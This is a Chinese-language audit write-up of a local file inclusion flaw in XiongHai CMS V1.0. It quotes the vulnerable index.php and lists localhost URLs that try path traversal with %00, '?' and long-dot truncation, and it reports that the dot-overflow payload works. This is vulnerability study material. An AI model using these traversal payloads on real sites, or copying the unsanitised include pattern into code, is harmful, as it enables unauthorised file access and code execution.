熊海cms
熊海CMS是由熊海開發的一款可廣泛應用於個人博客,個人網站,企業網站的一套網站綜合管理系統。
適用於個人博客、個人網站、企業網站等各種用途,前臺採用電腦、移動端兩種顯示模式,後臺使用HML5響應式佈局。
復現版本爲 熊海CMS_V1.0 版本,各位可自行下載。
代碼審計
先使用Seay工具審計一波,根據關鍵代碼回溯。
工具顯示index.php中文件包含函數存在變量,存在漏洞。
具體代碼如下:
<?php
//單一入口模式
error_reporting(0); //關閉錯誤顯示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判斷爲空或者等於index
include('files/'.$action.'.php'); //載入相應文件
?>
這是個很典型的文件包含漏洞,接受r參數,r不爲空則帶入包含文件。
漏洞復現
在根目錄下存放一個測試文件1.php。
利用漏洞包含文件。
%00截斷,失敗
http://localhost/xionghai_v1.0/index.php?r=../1.php%00
?號截斷,失敗
http://localhost/xionghai_v1.0/index.php?r=../1.php?
.溢出截斷,成功
http://localhost/xionghai_v1.0/index.php?r=../1.php........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................